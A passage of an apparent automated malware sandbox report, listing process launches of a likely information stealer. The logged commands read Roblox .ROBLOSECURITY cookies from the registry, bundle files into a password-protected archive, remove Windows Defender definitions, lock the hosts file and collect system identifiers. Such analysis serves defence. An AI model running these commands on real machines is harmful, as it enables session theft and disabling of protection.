                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:61
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                              Imagebase:0x7ff6241e0000
                                                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:62
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:63
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:64
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                                              Imagebase:0x7ff7e8150000
                                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:65
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:66
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:67
                                                                                                                                                                                                                                                              Start time:04:16:16
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                              Imagebase:0x7ff630ed0000
                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:68
                                                                                                                                                                                                                                                              Start time:04:16:17
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:69
                                                                                                                                                                                                                                                              Start time:04:16:17
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:70
                                                                                                                                                                                                                                                              Start time:04:16:17
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                                              Imagebase:0x7ff7e8150000
                                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:71
                                                                                                                                                                                                                                                              Start time:04:16:17
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:72
                                                                                                                                                                                                                                                              Start time:04:16:17
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:73
                                                                                                                                                                                                                                                              Start time:04:16:18
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                                              Imagebase:0x7ff7e8150000
                                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:75
                                                                                                                                                                                                                                                              Start time:04:16:18
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:76
                                                                                                                                                                                                                                                              Start time:04:16:18
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:77
                                                                                                                                                                                                                                                              Start time:04:16:18
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:78
                                                                                                                                                                                                                                                              Start time:04:16:18
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:79
                                                                                                                                                                                                                                                              Start time:04:16:18
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:80
                                                                                                                                                                                                                                                              Start time:04:16:18
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                                              Imagebase:0x7ff7e8150000
                                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:81
                                                                                                                                                                                                                                                              Start time:04:16:19
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                              Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:82
                                                                                                                                                                                                                                                              Start time:04:16:19
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:83
                                                                                                                                                                                                                                                              Start time:04:16:20
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:86
                                                                                                                                                                                                                                                              Start time:04:16:28
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:87
                                                                                                                                                                                                                                                              Start time:04:16:28
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:88
                                                                                                                                                                                                                                                              Start time:04:16:28
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
                                                                                                                                                                                                                                                              Imagebase:0x7ff623dd0000
                                                                                                                                                                                                                                                              File size:630'736 bytes
                                                                                                                                                                                                                                                              MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:89
                                                                                                                                                                                                                                                              Start time:04:16:29
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                              Imagebase:0x7ff6e05d0000
                                                                                                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:90
                                                                                                                                                                                                                                                              Start time:04:16:29
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:91
                                                                                                                                                                                                                                                              Start time:04:16:29
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:92
                                                                                                                                                                                                                                                              Start time:04:16:29
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:wmic os get Caption
                                                                                                                                                                                                                                                              Imagebase:0x7ff69bf10000
                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:93
                                                                                                                                                                                                                                                              Start time:04:16:30
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:94
                                                                                                                                                                                                                                                              Start time:04:16:30
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:95
                                                                                                                                                                                                                                                              Start time:04:16:30
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                              Imagebase:0x7ff69bf10000
                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:96
                                                                                                                                                                                                                                                              Start time:04:16:31
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:97
                                                                                                                                                                                                                                                              Start time:04:16:31
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:98
                                                                                                                                                                                                                                                              Start time:04:16:31
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                              Imagebase:0x7ff69bf10000
                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:99
                                                                                                                                                                                                                                                              Start time:04:16:32
                                                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                              Imagebase:0x7ff66a4e0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
